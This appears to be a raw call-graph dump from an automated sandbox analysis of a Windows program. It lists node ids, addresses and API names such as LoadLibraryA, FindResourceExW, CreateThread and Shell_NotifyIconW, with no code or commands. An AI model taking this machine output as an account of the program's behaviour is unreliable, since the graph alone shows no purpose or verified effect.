59 API calls 109877->109878 109879 4640d3 109878->109879 109880 407667 59 API calls 109879->109880 109881 4640db 109880->109881 109882 407667 59 API calls 109881->109882 109883 4640e3 109882->109883 109884 40459b 59 API calls 109883->109884 109885 4640fa 109884->109885 109886 40459b 59 API calls 109885->109886 109887 464113 109886->109887 109888 4079f2 59 API calls 109887->109888 109889 46411f 109888->109889 109890 464132 109889->109890 109891 407d2c 59 API calls 109889->109891 109892 4079f2 59 API calls 109890->109892 109891->109890 109893 46413b 109892->109893 109894 46414b 109893->109894 109895 407d2c 59 API calls 109893->109895 109895->109894 109917 469162 __write_nolock 109916->109917 109918 420db6 Mailbox 59 API calls 109917->109918 109919 4691bf 109918->109919 109920 40522e 59 API calls 109919->109920 109921 4691c9 109920->109921 109922 468f5f GetSystemTimeAsFileTime 109921->109922 109923 4691d4 109922->109923 109924 404ee5 85 API calls 109923->109924 109925 4691e7 _wcscmp 109924->109925 109926 46920b 109925->109926 109927 4692b8 109925->109927 110237 469734 109926->110237 109929 469734 96 API calls 109927->109929 109944 469284 _wcscat 109929->109944 109932 404f0b 74 API calls 109934 4692dd 109932->109934 109933 4692c1 109933->109354 109935 404f0b 74 API calls 109934->109935 109936 4692ed 109935->109936 109938 404f0b 74 API calls 109936->109938 109937 469239 _wcscat _wcscpy 110244 4240fb 58 API calls __wsplitpath_helper 109937->110244 109940 469308 109938->109940 109941 404f0b 74 API calls 109940->109941 109944->109932 109944->109933 109972 409b4d 109971->109972 109973 409b52 109971->109973 109972->109973 110305 42358a 59 API calls 109972->110305 109973->109281 109976 43ed4a 109975->109976 109977 407cbf 109975->109977 109978 408029 59 API calls 109976->109978 110306 407c50 109977->110306 109981 43ed55 __wsetenvp _memmove 109978->109981 109980 407cca 109980->109315 109982->109317 109983->109331 109985 407c45 109984->109985 109986 407bd8 __wsetenvp 109984->109986 109987 407d2c 59 API calls 109985->109987 109988 407c13 109986->109988 109989 407bee 109986->109989 109992 407bf6 _memmove 109987->109992 109991 408029 59 API calls 109988->109991 109990 407f27 59 API calls 109989->109990 109990->109992 109991->109992 109992->109340 110042 404c03 109993->110042 109996 404bdc 109997 404bf5 109996->109997 109998 404bec FreeLibrary 109996->109998 110000 42525b 109997->110000 109998->109997 109999 404c03 2 API calls 109999->109996 110046 425270 110000->110046 110002 404dfc 110002->109780 110002->109781 110127 404c36 110003->110127 110006 404b8f 110008 404ba1 FreeLibrary 110006->110008 110009 404baa 110006->110009 110007 404c36 2 API calls 110007->110006 110008->110009 110010 404c70 110009->110010 110011 420db6 Mailbox 59 API calls 110010->110011 110012 404c85 110011->110012 110131 40522e 110012->110131 110014 404c91 _memmove 110015 404ccc 110014->110015 110016 404dc1 110014->110016 110017 404d89 110014->110017 110018 404ec7 69 API calls 110015->110018 110145 46991b 95 API calls 110016->110145 110134 404e89 CreateStreamOnHGlobal 110017->110134 110022 404cd5 110018->110022 110021 404f0b 74 API calls 110021->110022 110022->110021 110023 404d69 110022->110023 110025 43d8a7 110022->110025 110140 404ee5 110022->110140 110023->109789 110026 404ee5 85 API calls 110025->110026 110027 43d8bb 110026->110027 110028 404f0b 74 API calls 110027->110028 110028->110023 110030 404f1d 110029->110030 110031 43d9cd 110029->110031 110163 4255e2 110030->110163 110034 469109 110183 468f5f 110034->110183 110036 46911f 110036->109796 110038 43d990 110037->110038 110039 404ed6 110037->110039 110188 425c60 110039->110188 110041 404ede 110043 404bd0 110042->110043 110044 404c0c LoadLibraryA 110042->110044 110043->109996 110043->109999 110044->110043 110045 404c1d GetProcAddress 110044->110045 110045->110043 110049 42527c __write 110046->110049 110047 42528f 110095 428b28 58 API calls __getptd_noexit 110047->110095 110049->110047 110051 4252c0 110049->110051 110050 425294 110096 428db6 9 API calls _memcpy_s 110050->110096 110065 4304e8 110051->110065 110054 4252c5 110055 4252db 110054->110055 110056 4252ce 110054->110056 110058 425305 110055->110058 110059 4252e5 110055->110059 110097 428b28 58 API calls __getptd_noexit 110056->110097 110080 430607 110058->110080 110098 428b28 58 API calls __getptd_noexit 110059->110098 110062 42529f __write @_EH4_CallFilterFunc@8 110062->110002 110066 4304f4 __write 110065->110066 110067 429c0b __lock 58 API calls 110066->110067 110077 430502 110067->110077 110068 430576 110100 4305fe 110068->110100 110069 43057d 110105 42881d 58 API calls __malloc_crt 110069->110105 110072 4305f3 __write 110072->110054 110073 430584 110073->110068 110106 429e2b InitializeCriticalSectionAndSpinCount 110073->110106 110076 429c93 __mtinitlocknum 58 API calls 110076->110077 110077->110068 110077->110069 110077->110076 110103 426c50 59 API calls __lock 110077->110103 110104 426cba LeaveCriticalSection LeaveCriticalSection _doexit 110077->110104 110078 4305aa EnterCriticalSection 110078->110068 110081 430627 __wopenfile 110080->110081 110082 430641 110081->110082 110094 4307fc 110081->110094 110113 4237cb 60 API calls 2 library calls 110081->110113 110111 428b28 58 API calls __getptd_noexit 110082->110111 110084 430646 110112 428db6 9 API calls _memcpy_s 110084->110112 110086 43085f 110108 4385a1 110086->110108 110088 425310 110099 425332 LeaveCriticalSection LeaveCriticalSection __wfsopen 110088->110099 110090 4307f5 110090->110094 110114 4237cb 60 API calls 2 library calls 110090->110114 110092 430814 110092->110094 110115 4237cb 60 API calls 2 library calls 110092->110115 110094->110082 110094->110086 110095->110050 110096->110062 110097->110062 110098->110062 110099->110062 110107 429d75 LeaveCriticalSection 110100->110107 110102 430605 110102->110072 110103->110077 110104->110077 110105->110073 110106->110078 110107->110102 110116 437d85 110108->110116 110110 4385ba 110110->110088 110111->110084 110112->110088 110113->110090 110114->110092 110115->110094 110117 437d91 __write 110116->110117 110118 437da7 110117->110118 110121 437ddd 110117->110121 110119 428b28 _memcpy_s 58 API calls 110118->110119 110120 437dac 110119->110120 110122 428db6 _memcpy_s 9 API calls 110120->110122 110123 437e4e __wsopen_nolock 109 API calls 110121->110123 110126 437db6 __write 110122->110126 110124 437df9 110123->110124 110125 437e22 __wsopen_helper LeaveCriticalSection 110124->110125 110125->110126 110126->110110 110128 404b83 110127->110128 110129 404c3f LoadLibraryA 110127->110129 110128->110006 110128->110007 110129->110128 110130 404c50 GetProcAddress 110129->110130 110130->110128 110132 420db6 Mailbox 59 API calls 110131->110132 110133 405240 110132->110133 110133->110014 110135 404ec0 110134->110135 110136 404ea3 FindResourceExW 110134->110136 110135->110015 110136->110135 110137 43d933 LoadResource 110136->110137 110137->110135 110138 43d948 SizeofResource 110137->110138 110138->110135 110139 43d95c LockResource 110138->110139 110139->110135 110141 404ef4 110140->110141 110142 43d9ab 110140->110142 110146 42584d 110141->110146 110144 404f02 110144->110022 110145->110015 110150 425859 __write 110146->110150 110147 42586b 110159 428b28 58 API calls __getptd_noexit 110147->110159 110149 425891 110152 426c11 __lock_file 59 API calls 110149->110152 110150->110147 110150->110149 110151 425870 110160 428db6 9 API calls _memcpy_s 110151->110160 110153 425897 110152->110153 110161 4257be 83 API calls 5 library calls 110153->110161 110156 4258a6 110162 4258c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 110156->110162 110158 42587b __write 110158->110144 110159->110151 110160->110158 110161->110156 110162->110158 110166 4255fd 110163->110166 110165 404f2e 110165->110034 110167 425609 __write 110166->110167 110168 42564c 110167->110168 110169 425644 __write 110167->110169 110173 42561f _memset 110167->110173 110170 426c11 __lock_file 59 API calls 110168->110170 110169->110165 110172 425652 110170->110172 110181 42541d 72 API calls 5 library calls 110172->110181 110179 428b28 58 API calls __getptd_noexit 110173->110179 110174 425639 110180 428db6 9 API calls _memcpy_s 110174->110180 110177 425668 110182 425686 LeaveCriticalSection LeaveCriticalSection __wfsopen 110177->110182 110179->110174 110180->110169 110181->110177 110182->110169 110186 42520a GetSystemTimeAsFileTime 110183->110186 110185 468f6e 110185->110036 110187 425238 __aulldiv 110186->110187 110187->110185 110189 425c6c __write 110188->110189 110190 425c93 110189->110190 110191 425c7e 110189->110191 110193 426c11 __lock_file 59 API calls 110190->110193 110202 428b28 58 API calls __getptd_noexit 110191->110202 110195 425c99 110193->110195 110194 425c83 110203 428db6 9 API calls _memcpy_s 110194->110203 110204 4258d0 67 API calls 6 library calls 110195->110204 110198 425ca4 110205 425cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 110198->110205 110200 425cb6 110201 425c8e __write 110200->110201 110201->110041 110202->110194 110203->110201 110204->110198 110205->110200 110207 407da6 110206->110207 110209 407d99 110206->110209 110208 420db6 Mailbox 59 API calls 110207->110208 110208->110209 110209->109816 110210->109845 110212 407a85 _memmove 110211->110212 110213 407a5f 110211->110213 110212->109858 110212->110212 110213->110212 110214 420db6 Mailbox 59 API calls 110213->110214 110215 407ad4 110214->110215 110216 420db6 Mailbox 59 API calls 110215->110216 110216->110212 110217->109859 110238 469748 __tzset_nolock _wcscmp 110237->110238 110239 404f0b 74 API calls 110238->110239 110240 469210 110238->110240 110241 469109 GetSystemTimeAsFileTime 110238->110241 110242 404ee5 85 API calls 110238->110242 110239->110238 110240->109933 110243 4240fb 58 API calls __wsplitpath_helper 110240->110243 110241->110238 110242->110238 110243->109937 110244->109944 110305->109973 110307 407c5f __wsetenvp 110306->110307 110308 408029 59 API calls 110307->110308 110309 407c70 _memmove 110307->110309 110310 43ed07 _memmove 110308->110310 110309->109980 110337 407a16 110311->110337 110313 40646a 110344 40750f 110313->110344 110315 406484 Mailbox 110315->109360 110318 407d8c 59 API calls 110332 406265 110318->110332 110319 40750f 59 API calls 110319->110332 110320 43dff6 110354 45f8aa 91 API calls 4 library calls 110320->110354 110324 43e004 110325 40750f 59 API calls 110324->110325 110326 43e01a 110325->110326 110326->110315 110327 406799 _memmove 110355 45f8aa 91 API calls 4 library calls 110327->110355 110328 43df92 110329 408029 59 API calls 110328->110329 110331 43df9d 110329->110331 110335 420db6 Mailbox 59 API calls 110331->110335 110332->110313 110332->110318 110332->110319 110332->110320 110332->110327 110332->110328 110333 407e4f 59 API calls 110332->110333 110342 405f6c 60 API calls 110332->110342 110343 405d41 59 API calls Mailbox 110332->110343 110352 405e72 60 API calls 110332->110352 110353 407924 59 API calls 2 library calls 110332->110353 110334 40643b CharUpperBuffW 110333->110334 110334->110332 110335->110327 110336->109364 110338 420db6 Mailbox 59 API calls 110337->110338 110339 407a3b 110338->110339 110340 408029 59 API calls 110339->110340 110341 407a4a 110340->110341 110341->110332 110342->110332 110343->110332 110345 4075af 110344->110345 110348 407522 _memmove 110344->110348 110347 420db6 Mailbox 59 API calls 110345->110347 110346 420db6 Mailbox 59 API calls 110349 407529 110346->110349 110347->110348 110348->110346 110350 420db6 Mailbox 59 API calls 110349->110350 110351 407552 110349->110351 110350->110351 110351->110315 110352->110332 110353->110332 110354->110324 110355->110315 110356->109144 110357->109142 110358->109000 110359->109033 110360->109033 110361->109022 110362->109029 110363->109032 110364->109029 110365->109039 110366->109063 110367 401066 110372 40f76f 110367->110372 110369 40106c 110370 422d40 __cinit 67 API calls 110369->110370 110371 401076 110370->110371 110373 40f790 110372->110373 110405 41ff03 110373->110405 110377 40f7d7 110378 407667 59 API calls 110377->110378 110379 40f7e1 110378->110379 110380 407667 59 API calls 110379->110380 110381 40f7eb 110380->110381 110382 407667 59 API calls 110381->110382 110383 40f7f5 110382->110383 110384 407667 59 API calls 110383->110384 110385 40f833 110384->110385 110386 407667 59 API calls 110385->110386 110387 40f8fe 110386->110387 110415 415f87 110387->110415 110391 40f930 110392 407667 59 API calls 110391->110392 110393 40f93a 110392->110393 110443 41fd9e 110393->110443 110395 40f981 110396 40f991 GetStdHandle 110395->110396 110397 40f9dd 110396->110397 110398 4445ab 110396->110398 110400 40f9e5 OleInitialize 110397->110400 110398->110397 110399 4445b4 110398->110399 110450 466b38 64 API calls Mailbox 110399->110450 110400->110369 110402 4445bb 110451 467207 CreateThread 110402->110451 110404 4445c7 CloseHandle 110404->110400 110452 41ffdc 110405->110452 110408 41ffdc 59 API calls 110409 41ff45 110408->110409 110410 407667 59 API calls 110409->110410 110411 41ff51 110410->110411 110412 407bcc 59 API calls 110411->110412 110413 40f796 110412->110413 110414 420162 6 API calls 110413->110414 110414->110377 110416 407667 59 API calls 110415->110416 110417 415f97 110416->110417 110418 407667 59 API calls 110417->110418 110419 415f9f 110418->110419 110459 415a9d 110419->110459 110422 415a9d 59 API calls 110423 415faf 110422->110423 110424 407667 59 API calls 110423->110424 110425 415fba 110424->110425 110426 420db6 Mailbox 59 API calls 110425->110426 110427 40f908 110426->110427 110428 4160f9 110427->110428 110429 416107 110428->110429 110430 407667 59 API calls 110429->110430 110431 416112 110430->110431 110432 407667 59 API calls 110431->110432 110433 41611d 110432->110433 110434 407667 59 API calls 110433->110434 110435 416128 110434->110435 110436 407667 59 API calls 110435->110436 110437 416133 110436->110437 110438 415a9d 59 API calls 110437->110438 110439 41613e 110438->110439 110440 420db6 Mailbox 59 API calls 110439->110440 110441 416145 RegisterWindowMessageW 110440->110441 110441->110391 110444 45576f 110443->110444 110445 41fdae 110443->110445 110462 469ae7 60 API calls 110444->110462 110446 420db6 Mailbox 59 API calls 110445->110446 110448 41fdb6 110446->110448 110448->110395 110449 45577a 110450->110402 110451->110404 110463 4671ed 65 API calls 110451->110463 110453 407667 59 API calls 110452->110453 110454 41ffe7 110453->110454 110455 407667 59 API calls 110454->110455 110456 41ffef 110455->110456 110457 407667 59 API calls 110456->110457 110458 41ff3b 110457->110458 110458->110408 110460 407667 59 API calls 110459->110460 110461 415aa5 110460->110461 110461->110422 110462->110449 110464 b8aaf0 110465 b8ab06 110464->110465 110469 b8ab57 110465->110469 110470 b86490 110465->110470 110467 b8ab20 110474 bbfaf0 110467->110474 110472 b85f10 110470->110472 110473 b85d90 110470->110473 110471 b86084 SetFilePointerEx 110471->110472 110472->110471 110472->110473 110473->110467 110473->110473 110475 bbfafd 110474->110475 110477 bbfb84 110474->110477 110476 bbfb2a 110475->110476 110475->110477 110480 bc032f 110476->110480 110493 bc1a1b 21 API calls 2 library calls 110476->110493 110481 bbfc05 110477->110481 110483 bbfbda 110477->110483 110479 bc08d6 110479->110469 110480->110469 110485 bbfc38 110481->110485 110492 bc0fe0 21 API calls __startOneArgErrorHandling 110481->110492 110483->110485 110486 bc116e 110483->110486 110487 bc1167 110483->110487 110484 bbfc22 110484->110469 110485->110469 110495 bc0fe0 21 API calls __startOneArgErrorHandling 110486->110495 110494 bc0ff7 21 API calls __startOneArgErrorHandling 110487->110494 110490 bc116c 110490->110469 110491 bc1173 110491->110469 110492->110484 110493->110479 110494->110490 110495->110491 110496 b86b50 110497 b86b57 110496->110497 110499 b85f10 110496->110499 110498 b86084 SetFilePointerEx 110498->110499 110499->110498 110500 b85d90 110499->110500 110500->110500 110501 44416f 110505 455fe6 110501->110505 110503 44417a 110504 455fe6 85 API calls 110503->110504 110504->110503 110510 456020 110505->110510 110512 455ff3 110505->110512 110506 456022 110517 409328 84 API calls Mailbox 110506->110517 110507 456027 110509 409837 84 API calls 110507->110509 110511 45602e 110509->110511 110510->110503 110513 407b2e 59 API calls 110511->110513 110512->110506 110512->110507 110512->110510 110514 45601a 110512->110514 110513->110510 110516 4095a0 59 API calls _wcsstr 110514->110516 110516->110510 110517->110507 110518 403633 110519 40366a 110518->110519 110520 4036e7 110519->110520 110521 403688 110519->110521 110522 4036e5 110519->110522 110526 4036ed 110520->110526 110527 43d0cc 110520->110527 110523 403695 110521->110523 110524 40374b PostQuitMessage 110521->110524 110525 4036ca DefWindowProcW 110522->110525 110529 4036a0 110523->110529 110530 43d154 110523->110530 110531 4036d8 110524->110531 110525->110531 110532 4036f2 110526->110532 110533 403715 SetTimer RegisterWindowMessageW 110526->110533 110573 411070 10 API calls Mailbox 110527->110573 110535 403755 110529->110535 110536 4036a8 110529->110536 110589 462527 71 API calls _memset 110530->110589 110539 4036f9 KillTimer 110532->110539 110540 43d06f 110532->110540 110533->110531 110537 40373e CreatePopupMenu 110533->110537 110534 43d0f3 110574 411093 341 API calls Mailbox 110534->110574 110563 4044a0 110535->110563 110542 4036b3 110536->110542 110543 43d139 110536->110543 110537->110531 110570 40443a Shell_NotifyIconW _memset 110539->110570 110546 43d074 110540->110546 110547 43d0a8 MoveWindow 110540->110547 110549 4036be 110542->110549 110550 43d124 110542->110550 110543->110525 110588 457c36 59 API calls Mailbox 110543->110588 110544 43d166 110544->110525 110544->110531 110551 43d097 SetFocus 110546->110551 110552 43d078 110546->110552 110547->110531 110549->110525 110575 40443a Shell_NotifyIconW _memset 110549->110575 110587 462d36 81 API calls _memset 110550->110587 110551->110531 110552->110549 110556 43d081 110552->110556 110553 40370c 110571 403114 DeleteObject DestroyWindow Mailbox 110553->110571 110572 411070 10 API calls Mailbox 110556->110572 110559 43d134 110559->110531 110561 43d118 110576 40434a 110561->110576 110564 4044b7 _memset 110563->110564 110565 404539 110563->110565 110590 40407c 110564->110590 110565->110531 110567 404522 KillTimer SetTimer 110567->110565 110568 4044de 110568->110567 110569 43d4ab Shell_NotifyIconW 110568->110569 110569->110567 110570->110553 110571->110531 110572->110531 110573->110534 110574->110549 110575->110561 110577 404375 _memset 110576->110577 110612 404182 110577->110612 110580 4043fa 110582 404430 Shell_NotifyIconW 110580->110582 110583 404414 Shell_NotifyIconW 110580->110583 110584 404422 110582->110584 110583->110584 110585 40407c 61 API calls 110584->110585 110586 404429 110585->110586 110586->110522 110587->110559 110588->110522 110589->110544 110591 404098 110590->110591 110611 40416f Mailbox 110590->110611 110592 407a16 59 API calls 110591->110592 110593 4040a6 110592->110593 110594 4040b3 110593->110594 110595 43d3c8 LoadStringW 110593->110595 110596 407bcc 59 API calls 110594->110596 110598 43d3e2 110595->110598 110597 4040c8 110596->110597 110597->110598 110599 4040d9 110597->110599 110600 407b2e 59 API calls 110598->110600 110601 4040e3 110599->110601 110602 404174 110599->110602 110605 43d3ec 110600->110605 110604 407b2e 59 API calls 110601->110604 110603 408047 59 API calls 110602->110603 110608 4040ed _memset _wcscpy 110603->110608 110604->110608 110606 407cab 59 API calls 110605->110606 110605->110608 110607 43d40e 110606->110607 110610 407cab 59 API calls 110607->110610 110609 404155 Shell_NotifyIconW 110608->110609 110609->110611 110610->110608 110611->110568 110613 43d423 110612->110613 110614 404196 110612->110614 110613->110614 110615 43d42c DestroyIcon 110613->110615 110614->110580 110616 462f94 62 API calls _W_store_winword 110614->110616 110615->110614 110616->110580 110617 427c56 110618 427c62 110617->110618 110654 429e08 GetStartupInfoW 110618->110654 110621 427c67 110656 428b7c GetProcessHeap 110621->110656 110622 427cbf 110623 427cca 110622->110623 110739 427da6 58 API calls 3 library calls 110622->110739 110657 429ae6 110623->110657 110626 427cd0 110628 427cdb __RTC_Initialize 110626->110628 110740 427da6 58 API calls 3 library calls 110626->110740 110678 42d5d2 110628->110678 110630 427cea 110631 427cf6 GetCommandLineW 110630->110631 110741 427da6 58 API calls 3 library calls 110630->110741 110697 434f23 GetEnvironmentStringsW 110631->110697 110634 427cf5 110634->110631 110637 427d10 110638 427d1b 110637->110638 110742 4230b5 58 API calls 3 library calls 110637->110742 110707 434d58 110638->110707 110641 427d21 110642 427d2c 110641->110642 110743 4230b5 58 API calls 3 library calls 110641->110743 110721 4230ef 110642->110721 110645 427d34 110646 427d3f __wwincmdln 110645->110646 110744 4230b5 58 API calls 3 library calls 110645->110744 110727 4047d0 110646->110727 110649 427d53 110650 427d62 110649->110650 110745 423358 58 API calls _doexit 110649->110745 110746 4230e0 58 API calls _doexit 110650->110746 110653 427d67 __write 110655 429e1e 110654->110655 110655->110621 110656->110622 110747 423187 36 API calls 2 library calls 110657->110747 110659 429aeb 110748 429d3c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 110659->110748 110661 429af4 110749 429b5c 61 API calls 2 library calls 110661->110749 110662 429af0 110662->110661 110750 429d8a TlsAlloc 110662->110750 110665 429b06 110665->110661 110667 429b11 110665->110667 110666 429af9 110666->110626 110751 4287d5 110667->110751 110670 429b53 110759 429b5c 61 API calls 2 library calls 110670->110759 110673 429b32 110673->110670 110675 429b38 110673->110675 110674 429b58 110674->110626 110758 429a33 58 API calls 4 library calls 110675->110758 110677 429b40 GetCurrentThreadId 110677->110626 110679 42d5de __write 110678->110679 110680 429c0b __lock 58 API calls 110679->110680 110681 42d5e5 110680->110681 110682 4287d5 __calloc_crt 58 API calls 110681->110682 110683 42d5f6 110682->110683 110684 42d661 GetStartupInfoW 110683->110684 110685 42d601 __write @_EH4_CallFilterFunc@8 110683->110685 110691 42d676 110684->110691 110694 42d7a5 110684->110694 110685->110630 110686 42d86d 110773 42d87d LeaveCriticalSection _doexit 110686->110773 110688 4287d5 __calloc_crt 58 API calls 110688->110691 110689 42d7f2 GetStdHandle 110689->110694 110690 42d805 GetFileType 110690->110694 110691->110688 110692 42d6c4 110691->110692 110691->110694 110693 42d6f8 GetFileType 110692->110693 110692->110694 110771 429e2b InitializeCriticalSectionAndSpinCount 110692->110771 110693->110692 110694->110686 110694->110689 110694->110690 110772 429e2b InitializeCriticalSectionAndSpinCount 110694->110772 110698 434f34 110697->110698 110699 427d06 110697->110699 110774 42881d 58 API calls __malloc_crt 110698->110774 110703 434b1b GetModuleFileNameW 110699->110703 110701 434f5a _memmove 110702 434f70 FreeEnvironmentStringsW 110701->110702 110702->110699 110704 434b4f _wparse_cmdline 110703->110704 110706 434b8f _wparse_cmdline 110704->110706 110775 42881d 58 API calls __malloc_crt 110704->110775 110706->110637 110708 434d71 __wsetenvp 110707->110708 110712 434d69 110707->110712 110709 4287d5 __calloc_crt 58 API calls 110708->110709 110717 434d9a __wsetenvp 110709->110717 110710 434df1 110711 422d55 _free 58 API calls 110710->110711 110711->110712 110712->110641 110713 4287d5 __calloc_crt 58 API calls 110713->110717 110714 434e16 110715 422d55 _free 58 API calls 110714->110715 110715->110712 110717->110710 110717->110712 110717->110713 110717->110714 110718 434e2d 110717->110718 110776 434607 58 API calls _memcpy_s 110717->110776 110777 428dc6 IsProcessorFeaturePresent 110718->110777 110720 434e39 110720->110641 110723 4230fb __IsNonwritableInCurrentImage 110721->110723 110792 42a4d1 110723->110792 110724 423119 __initterm_e 110725 422d40 __cinit 67 API calls 110724->110725 110726 423138 _doexit __IsNonwritableInCurrentImage 110724->110726 110725->110726 110726->110645 110728 4047ea 110727->110728 110738 404889 110727->110738 110729 404824 IsThemeActive 110728->110729 110795 42336c 110729->110795 110733 404850 110807 4048fd SystemParametersInfoW SystemParametersInfoW 110733->110807 110735 40485c 110808 403b3a 110735->110808 110737 404864 SystemParametersInfoW 110737->110738 110738->110649 110739->110623 110740->110628 110741->110634 110745->110650 110746->110653 110747->110659 110748->110662 110749->110666 110750->110665 110753 4287dc 110751->110753 110754 428817 110753->110754 110756 4287fa 110753->110756 110760 4351f6 110753->110760 110754->110670 110757 429de6 TlsSetValue 110754->110757 110756->110753 110756->110754 110768 42a132 Sleep 110756->110768 110757->110673 110758->110677 110759->110674 110761 435201 110760->110761 110767 43521c 110760->110767 110762 43520d 110761->110762 110761->110767 110769 428b28 58 API calls __getptd_noexit 110762->110769 110763 43522c RtlAllocateHeap 110766 435212 110763->110766 110763->110767 110766->110753 110767->110763 110767->110766 110770 4233a1 DecodePointer 110767->110770 110768->110756 110769->110766 110770->110767 110771->110692 110772->110694 110773->110685 110774->110701 110775->110706 110776->110717 110778 428dd1 110777->110778 110783 428c59 110778->110783 110782 428dec 110782->110720 110784 428c73 _memset ___raise_securityfailure 110783->110784 110785 428c93 IsDebuggerPresent 110784->110785 110791 42a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 110785->110791 110787 42c5f6 __except_handler4 6 API calls 110789 428d7a 110787->110789 110788 428d57 ___raise_securityfailure 110788->110787 110790 42a140 GetCurrentProcess TerminateProcess 110789->110790 110790->110782 110791->110788 110793 42a4d4 EncodePointer 110792->110793 110793->110793 110794 42a4ee 110793->110794 110794->110724 110796 429c0b __lock 58 API calls 110795->110796 110797 423377 DecodePointer EncodePointer 110796->110797 110860 429d75 LeaveCriticalSection 110797->110860 110799 404849 110800 4233d4 110799->110800 110801 4233f8 110800->110801 110802 4233de 110800->110802 110801->110733 110802->110801 110861 428b28 58 API calls __getptd_noexit 110802->110861 110804 4233e8 110862 428db6 9 API calls _memcpy_s 110804->110862 110806 4233f3 110806->110733 110807->110735 110809 403b47 __write_nolock 110808->110809 110810 407667 59 API calls 110809->110810 110811 403b51 GetCurrentDirectoryW 110810->110811 110863 403766 110811->110863 110813 403b7a IsDebuggerPresent 110814 43d272 MessageBoxA 110813->110814 110815 403b88 110813->110815 110818 43d28c 110814->110818 110816 403c61 110815->110816 110815->110818 110819 403ba5 110815->110819 110817 403c68 SetCurrentDirectoryW 110816->110817 110820 403c75 Mailbox 110817->110820 110985 407213 59 API calls Mailbox 110818->110985 110944 407285 110819->110944 110820->110737 110826 43d29c 110828 43d2b2 SetCurrentDirectoryW 110826->110828 110828->110820 110860->110799 110861->110804 110862->110806 110864 407667 59 API calls 110863->110864 110865 40377c 110864->110865 110994 403d31 110865->110994 110867 40379a 110868 404706 61 API calls 110867->110868 110869 4037ae 110868->110869 110870 407de1 59 API calls 110869->110870 110871 4037bb 110870->110871 110872 404ddd 136 API calls 110871->110872 110873 4037d4 110872->110873 110874 43d173 110873->110874 110875 4037dc Mailbox 110873->110875 111036 46955b 110874->111036 110879 408047 59 API calls 110875->110879 110878 43d192 110881 422d55 _free 58 API calls 110878->110881 110882 4037ef 110879->110882 110880 404e4a 84 API calls 110880->110878 110883 43d19f 110881->110883 111008 40928a 110882->111008 110885 404e4a 84 API calls 110883->110885 110887 43d1a8 110885->110887 110891 403ed0 59 API calls 110887->110891 110888 407de1 59 API calls 110889 403808 110888->110889 110890 4084c0 69 API calls 110889->110890 110892 40381a Mailbox 110890->110892 110893 43d1c3 110891->110893 110894 407de1 59 API calls 110892->110894 110895 403ed0 59 API calls 110893->110895 110896 403840 110894->110896 110897 43d1df 110895->110897 110898 4084c0 69 API calls 110896->110898 110899 404706 61 API calls 110897->110899 110901 40384f Mailbox 110898->110901 110900 43d204 110899->110900 110902 403ed0 59 API calls 110900->110902 110904 407667 59 API calls 110901->110904 110903 43d210 110902->110903 110905 408047 59 API calls 110903->110905 110906 40386d 110904->110906 110907 43d21e 110905->110907 111011 403ed0 110906->111011 110909 403ed0 59 API calls 110907->110909 110911 43d22d 110909->110911 110917 408047 59 API calls 110911->110917 110913 403887 110913->110887 110914 403891 110913->110914 110915 422efd _W_store_winword 60 API calls 110914->110915 110916 40389c 110915->110916 110916->110893 110918 4038a6 110916->110918 110919 43d24f 110917->110919 110920 422efd _W_store_winword 60 API calls 110918->110920 110921 403ed0 59 API calls 110919->110921 110922 4038b1 110920->110922 110923 43d25c 110921->110923 110922->110897 110924 4038bb 110922->110924 110923->110923 110925 422efd _W_store_winword 60 API calls 110924->110925 110926 4038c6 110925->110926 110926->110911 110927 403907 110926->110927 110929 403ed0 59 API calls 110926->110929 110927->110911 110928 403914 110927->110928 110930 4092ce 59 API calls 110928->110930 110931 4038ea 110929->110931 110932 403924 110930->110932 110933 408047 59 API calls 110931->110933 110934 409050 59 API calls 110932->110934 110935 4038f8 110933->110935 110936 403932 110934->110936 110937 403ed0 59 API calls 110935->110937 111027 408ee0 110936->111027 110937->110927 110939 40928a 59 API calls 110941 40394f 110939->110941 110940 408ee0 60 API calls 110940->110941 110941->110939 110941->110940 110942 403ed0 59 API calls 110941->110942 110943 403995 Mailbox 110941->110943 110942->110941 110943->110813 110945 407292 __write_nolock 110944->110945 110946 4072ab 110945->110946 110947 43ea22 _memset 110945->110947 111081 404750 110946->111081 110949 43ea3e GetOpenFileNameW 110947->110949 110951 43ea8d 110949->110951 110954 407bcc 59 API calls 110951->110954 110956 43eaa2 110954->110956 110956->110956 110957 4072c9 111109 40686a 110957->111109 110985->110826 110995 403d3e __write_nolock 110994->110995 110996 407bcc 59 API calls 110995->110996 111001 403ea4 Mailbox 110995->111001 110998 403d70 110996->110998 110997 4079f2 59 API calls 110997->110998 110998->110997 111007 403da6 Mailbox 110998->111007 110999 4079f2 59 API calls 110999->111007 111000 403e77 111000->111001 111002 407de1 59 API calls 111000->111002 111001->110867 111003 403e98 111002->111003 111005 403f74 59 API calls 111003->111005 111004 407de1 59 API calls 111004->111007 111005->111001 111007->110999 111007->111000 111007->111001 111007->111004 111071 403f74 111007->111071 111009 420db6 Mailbox 59 API calls 111008->111009 111010 4037fb 111009->111010 111010->110888 111012 403ef3 111011->111012 111013 403eda 111011->111013 111015 407bcc 59 API calls 111012->111015 111014 408047 59 API calls 111013->111014 111016 403879 111014->111016 111015->111016 111017 422efd 111016->111017 111018 422f7e 111017->111018 111019 422f09 111017->111019 111079 422f90 60 API calls 3 library calls 111018->111079 111025 422f2e 111019->111025 111077 428b28 58 API calls __getptd_noexit 111019->111077 111022 422f8b 111022->110913 111023 422f15 111078 428db6 9 API calls _memcpy_s 111023->111078 111025->110913 111026 422f20 111026->110913 111028 43f17c 111027->111028 111030 408ef7 111027->111030 111028->111030 111080 408bdb 59 API calls Mailbox 111028->111080 111031 409040 111030->111031 111032 408ff8 111030->111032 111035 408fff 111030->111035 111033 409d3c 60 API calls 111031->111033 111034 420db6 Mailbox 59 API calls 111032->111034 111033->111035 111034->111035 111035->110941 111037 404ee5 85 API calls 111036->111037 111038 4695ca 111037->111038 111039 469734 96 API calls 111038->111039 111040 4695dc 111039->111040 111041 404f0b 74 API calls 111040->111041 111068 43d186 111040->111068 111042 4695f7 111041->111042 111043 404f0b 74 API calls 111042->111043 111044 469607 111043->111044 111045 404f0b 74 API calls 111044->111045 111046 469622 111045->111046 111047 404f0b 74 API calls 111046->111047 111048 46963d 111047->111048 111049 404ee5 85 API calls 111048->111049 111050 469654 111049->111050 111051 42571c __malloc_crt 58 API calls 111050->111051 111052 46965b 111051->111052 111053 42571c __malloc_crt 58 API calls 111052->111053 